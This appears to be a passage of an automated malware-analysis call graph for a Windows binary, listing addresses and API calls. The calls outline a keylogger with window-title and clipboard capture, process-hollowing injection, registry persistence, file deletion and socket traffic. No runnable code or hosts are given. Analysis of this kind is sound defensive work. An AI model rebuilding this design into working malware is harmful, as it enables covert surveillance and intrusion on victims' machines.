5867 407804 5865->5867 5869 40aa65 7 API calls 5866->5869 5870 407810 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5867->5870 5871 40782a ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5867->5871 5869->5867 5872 40ad45 2 API calls 5870->5872 5873 40a9ef 3 API calls 5871->5873 5874 407827 5872->5874 5875 407880 5873->5875 5874->5871 5876 407887 GetModuleFileNameW 5875->5876 5877 407899 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA 5875->5877 5878 4078a9 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5876->5878 5877->5878 5879 4078c7 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 5878->5879 5880 4078de SetFileAttributesW 5878->5880 5879->5880 5881 4078f4 5880->5881 5882 4078f7 7 API calls 5880->5882 5881->5882 5883 4079bc 7 API calls 5882->5883 5884 40795f 7 API calls 5882->5884 5885 407a2d ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5883->5885 5886 407a1f ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5883->5886 5884->5883 5887 407a77 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5885->5887 5888 407a37 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5885->5888 5886->5885 5889 4118f7 4 API calls 5887->5889 5888->5887 5890 407aad 5889->5890 5891 407ab4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 5890->5891 5892 407acd exit 5890->5892 5891->5892 5893->5850 5895 406096 UnhookWindowsHookEx TerminateThread 5894->5895 5896 4060a9 5894->5896 5895->5896 5922 406037 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5896->5922 5900 41178f 18 API calls 5899->5900 5901 4100d7 5900->5901 5901->5853 5903 4117fe wcscpy 5902->5903 5905 4118e5 5902->5905 5904 41181a FindNextFileW 5903->5904 5906 4118be GetLastError 5904->5906 5911 411832 5904->5911 5905->5858 5907 4118ea FindClose 5906->5907 5906->5911 5907->5905 5909 4118d7 FindClose RemoveDirectoryW 5909->5905 5910 411847 wcscat 5910->5911 5911->5904 5911->5907 5911->5909 5911->5910 5912 411899 SetFileAttributesW 5911->5912 5913 4118ab DeleteFileW 5911->5913 5914 41178f 2 API calls 5911->5914 5915 411873 RemoveDirectoryW 5911->5915 5916 41187c wcscpy 5911->5916 5925 41175b wcscmp 5911->5925 5912->5913 5913->5907 5913->5911 5914->5911 5915->5916 5916->5911 5918 40aac4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5917->5918 5919 40aa7c ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 5917->5919 5918->5865 5920 40aab3 5919->5920 5921 40aab5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5919->5921 5920->5921 5921->5865 5923 406074 5922->5923 5924 406065 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RemoveDirectoryW 5922->5924 5923->5851 5924->5923 5926 411775 wcscmp 5925->5926 5927 411785 5925->5927 5926->5927 5927->5911 5938 4011e5 FindWindowA 5928->5938 5930 40121b 5931 401227 Sleep 5930->5931 5932 401234 105 API calls 5930->5932 5931->5928 5932->5930 5939 4011d2 FindWindowA 5933->5939 5935 401209 Sleep 5935->5933 5936 401234 105 API calls 5937 4011fd 5936->5937 5937->5935 5937->5936 5938->5930 5939->5937 5940->5481 5941->5491 5943 41133c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5942->5943 5943->5230 5945 4116dd ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5944->5945 5945->5564 5948 411686 OpenProcess 5947->5948 5949 40924b 5947->5949 5948->5949 5949->5571 5949->5574 5958 40a8ff RegOpenKeyExW 5950->5958 5952 410e9a ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5962 41146f ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI 5952->5962 5954 410ef5 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5954->5546 5966 40ede9 5955->5966 5959 40a92a RegQueryValueExW RegCloseKey 5958->5959 5960 40a95b 5958->5960 5961 40a964 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5959->5961 5960->5961 5961->5952 5963 4114ca ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5962->5963 5964 41148f ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5962->5964 5965 4114d7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5963->5965 5964->5965 5965->5954 5982 412850 5966->5982 5968 40edf3 GetModuleHandleA GetProcAddress 5969 40ee2b 5968->5969 5970 40933c 5968->5970 5969->5970 5971 40ee3f CreateProcessW 5969->5971 5970->5562 5970->5563 5971->5970 5972 40ee72 VirtualAlloc GetThreadContext 5971->5972 5972->5970 5973 40ee9f ReadProcessMemory 5972->5973 5973->5970 5974 40eec1 VirtualAllocEx 5973->5974 5974->5970 5976 40eeef WriteProcessMemory 5974->5976 5976->5970 5977 40ef0a 5976->5977 5978 40ef17 WriteProcessMemory 5977->5978 5979 40ef4b WriteProcessMemory 5977->5979 5978->5977 5979->5970 5980 40ef68 SetThreadContext 5979->5980 5980->5970 5981 40ef85 ResumeThread 5980->5981 5981->5970 5982->5968 5986 404748 5983->5986 5990 404762 5986->5990 5987 401289 6 API calls 5988 40478b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5987->5988 5999 411b14 GetForegroundWindow GetWindowTextLengthA 5988->5999 5990->5987 5991 4047a3 Sleep 5990->5991 5992 4047ac 8 API calls 5990->5992 5994 401289 6 API calls 5990->5994 5997 404845 Sleep 5990->5997 6017 4050a8 5990->6017 5991->5990 5993 4044ed 148 API calls 5992->5993 5993->5990 5995 40482d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5994->5995 5996 411b14 43 API calls 5995->5996 5996->5990 5997->5990 6000 411b33 7 API calls 5999->6000 6001 411c04 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5999->6001 6026 41235c 6000->6026 6003 411c0f 6001->6003 6003->5990 6005 411550 20 API calls 6012 411bb1 6005->6012 6006 411bf3 6007 401ad8 2 API calls 6006->6007 6009 411bfb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6007->6009 6008 401289 6 API calls 6010 411bcf ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 6008->6010 6009->6001 6011 411c13 6010->6011 6010->6012 6013 411c42 6011->6013 6014 411c19 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6011->6014 6012->6006 6012->6008 6015 401ad8 2 API calls 6013->6015 6014->6013 6016 411c4a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6015->6016 6016->6003 6018 4050b8 6017->6018 6021 405121 6017->6021 6019 4050c6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6018->6019 6020 4050de ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6018->6020 6028 40512c 7 API calls 6019->6028 6032 410cd2 6020->6032 6021->5990 6024 405107 6024->6021 6025 405118 UnhookWindowsHookEx 6024->6025 6025->6021 6027 411b88 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6026->6027 6027->6005 6029 4051ca ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD SetEvent 6028->6029 6030 4051bf ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 6028->6030 6031 4051dc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6029->6031 6030->6031 6031->6020 6033 410d83 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6032->6033 6034 410ce5 11 API calls 6032->6034 6033->6024 6034->6033 6036 4044db 6035->6036 6036->5587 6036->5588 6046 404955 6037->6046 6097 404d2c 6040->6097 6135 404643 6043->6135 6047 404970 Sleep 6046->6047 6081 4048a0 6047->6081 6050 404997 ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6052 4049a6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CreateDirectoryW 6050->6052 6053 4049ba ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ GetFileAttributesW 6050->6053 6051 404603 6052->6053 6054 4049d0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 6053->6054 6055 4049e4 6053->6055 6054->6055 6056 401289 6 API calls 6055->6056 6057 4049ed ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6056->6057 6058 4049fa ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6057->6058 6059 404a2c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6057->6059 6060 4118f7 4 API calls 6058->6060 6092 402ebe 6059->6092 6062 404a24 6060->6062 6064 404b38 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 6062->6064 6063 404a5c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ PathFileExistsW 6065 404ad3 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6063->6065 6066 404a6f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6063->6066 6067 401289 6 API calls 6064->6067 6069 402fc1 4 API calls 6065->6069 6068 411980 6 API calls 6066->6068 6070 404b4e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6067->6070 6071 404a8e 6068->6071 6072 404b06 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6069->6072 6074 404b5b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 6070->6074 6075 404b6c 6070->6075 6076 404a94 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6071->6076 6077 404aca ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6071->6077 6094 4119ef ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6072->6094 6074->6075 6075->6047 6075->6051 6079 402fc1 4 API calls 6076->6079 6077->6065 6078 404b23 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6078->6064 6080 404ab7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6079->6080 6080->6077 6082 404951 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6081->6082 6084 4048b6 6081->6084 6082->6050 6082->6075 6083 4048bb ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CreateFileW 6083->6084 6085 4048e4 GetFileSize 6083->6085 6084->6083 6086 40491b CloseHandle 6084->6086 6087 40492d 6084->6087 6088 404910 Sleep 6084->6088 6090 4050a8 28 API calls 6084->6090 6085->6084 6085->6086 6086->6084 6087->6082 6089 40493b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 6087->6089 6088->6086 6091 4044ed 142 API calls 6089->6091 6090->6088 6091->6082 6093 402ecf 6092->6093 6093->6063 6095 4118f7 4 API calls 6094->6095 6096 411a11 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6095->6096 6096->6078 6108 404d3e 6097->6108 6098 404612 6099 404d5a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6102 41282a 2 API calls 6099->6102 6100 404d7b Sleep GetForegroundWindow GetWindowTextLengthA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@ 6101 404dae ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetWindowTextA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 6100->6101 6100->6108 6103 404dde ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6101->6103 6101->6108 6102->6108 6115 404857 6103->6115 6106 404e36 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6106->6108 6107 404eeb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6107->6108 6108->6098 6108->6099 6108->6100 6108->6107 6109 404ef9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6108->6109 6110 411200 GetLastInputInfo GetTickCount 6108->6110 6111 404e82 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6108->6111 6112 404e76 Sleep 6108->6112 6120 405f6d 6108->6120 6109->6098 6110->6108 6113 404857 4 API calls 6111->6113 6112->6108 6114 404ed9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6113->6114 6114->6107 6116 404870 6115->6116 6117 404863 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 6115->6117 6118 404876 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ SetEvent 6116->6118 6119 40488c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6116->6119 6117->6116 6118->6119 6119->6106 6121 405f86 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6120->6121 6125 405fa3 6120->6125 6123 41282a 2 API calls 6121->6123 6123->6125 6124 405faf ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 6126 405fc5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6124->6126 6127 40601e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6124->6127 6131 405f27 OpenClipboard 6125->6131 6126->6127 6128 405fe6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6126->6128 6127->6108 6129 404857 4 API calls 6128->6129 6130 406015 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6129->6130 6130->6127 6132 405f4c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6131->6132 6133 405f38 GetClipboardData CloseClipboard 6131->6133 6132->6124 6133->6132 6136 404659 SetWindowsHookExA 6135->6136 6137 40466e GetMessageA 6135->6137 6138 40466a 6136->6138 6139 4045e3 6137->6139 6140 40467f TranslateMessage DispatchMessageA 6137->6140 6138->6137 6138->6139 6140->6138 6145 406d25 6141->6145 6148 406d7f Sleep 6145->6148 6149 406d9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6145->6149 6155 406b78 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6145->6155 6174 406920 12 API calls 6145->6174 6191 4065db 13 API calls 6145->6191 6212 406511 6 API calls 6145->6212 6224 406447 6 API calls 6145->6224 6148->6145 6150 404857 4 API calls 6149->6150 6151 406dbe 6150->6151 6152 406de3 6151->6152 6153 406dc6 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6151->6153 6154 40ab86 3 API calls 6153->6154 6154->6152 6156 40a87f 4 API calls 6155->6156 6157 406bae ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6156->6157 6158 406bd9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6157->6158 6159 406bff ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ExpandEnvironmentStringsA PathFileExistsA 6157->6159 6161 404857 4 API calls 6158->6161 6160 406c54 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6159->6160 6171 406c2c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6159->6171 6163 4112fa 7 API calls 6160->6163 6167 406bf8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6161->6167 6165 406c75 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6163->6165 6164 404857 4 API calls 6164->6167 6168 41178f 18 API calls 6165->6168 6167->6145 6169 406c85 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6168->6169 6170 406caf ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 6169->6170 6169->6171 6170->6167 6172 406cc3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6170->6172 6171->6164 6173 404857 4 API calls 6172->6173 6173->6167 6175 4069e7 FindNextFileA 6174->6175 6176 4069ca FindClose 6174->6176 6186 4069f9 6175->6186 6177 406b10 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6176->6177 6179 404857 4 API calls 6177->6179 6178 406b38 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6180 404857 4 API calls 6178->6180 6182 406b20 6179->6182 6184 406b57 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6180->6184 6181 406ae1 FindNextFileA 6181->6186 6183 406b22 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6182->6183 6185 406b74 6183->6185 6184->6185 6185->6145 6186->6178 6186->6181 6187 406a7e 7 API calls 6186->6187 6188 406b01 6187->6188 6189 406ad7 GetLastError 6187->6189 6188->6177 6189->6181 6190 406af6 FindClose 6189->6190 6190->6183 6192 4066c2 FindNextFileA 6191->6192 6193 406693 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6191->6193 6194 40687d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6192->6194 6204 4066dc 6192->6204 6195 404857 4 API calls 6193->6195 6197 404857 4 API calls 6194->6197 6196 4066bb 6195->6196 6198 406901 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6196->6198 6199 40689c FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6197->6199 6201 4068c2 6198->6201 6199->6201 6200 406865 FindNextFileA 6200->6194 6200->6204 6201->6145 6202 406760 10 API calls 6203 4067f2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 6202->6203 6202->6204 6203->6204 6205 406806 GetLastError 6203->6205 6204->6200 6204->6202 6206 406823 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 6204->6206 6210 4068d7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6204->6210 6205->6204 6207 4068c7 FindClose 6205->6207 6206->6204 6208 406837 GetLastError 6206->6208 6207->6198 6208->6204 6208->6207 6211 404857 4 API calls 6210->6211 6211->6207 6213 406561 GetLastError 6212->6213 6214 4065ab ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6212->6214 6215 40656b 6213->6215 6216 406572 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6213->6216 6217 404857 4 API calls 6214->6217 6215->6216 6218 40656e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6215->6218 6221 404857 4 API calls 6216->6221 6217->6218 6223 4065d8 6218->6223 6222 406592 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6221->6222 6222->6223 6223->6145 6225 4064e1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6224->6225 6226 406497 GetLastError 6224->6226 6227 404857 4 API calls 6225->6227 6228 4064a1 6226->6228 6229 4064a8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6226->6229 6231 4064a4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6227->6231 6228->6229 6228->6231 6232 404857 4 API calls 6229->6232 6235 40650e 6231->6235 6234 4064c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6232->6234 6234->6235 6235->6145 6238 410f90 6236->6238 6237 410fec ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6237->5612 6238->6237 6240 401fd4 socket 6239->6240 6241 401fcf 6239->6241 6243 401fe6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6240->6243 6274 401ffb WSAStartup 6241->6274 6243->5628 6244->5641 6245->5655 6246->5655 6247->5665 6248->5665 6249->5665 6250->5665 6251->5665 6252->5667 6275 4023c0 6 API calls 6253->6275 6255 402066 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6255->5669 6257 4020f9 malloc recv 6256->6257 6258 402161 free 6257->6258 6259 402118 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 6257->6259 6258->6257 6263 40216d 6258->6263 6259->6258 6260 402150 6259->6260 6281 40219e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6260->6281 6262 402181 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6262->5671 6263->6262 6300 40264b 6263->6300 6266 405030 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6265->6266 6271 40509d 6265->6271 6267 40512c 11 API calls 6266->6267 6268 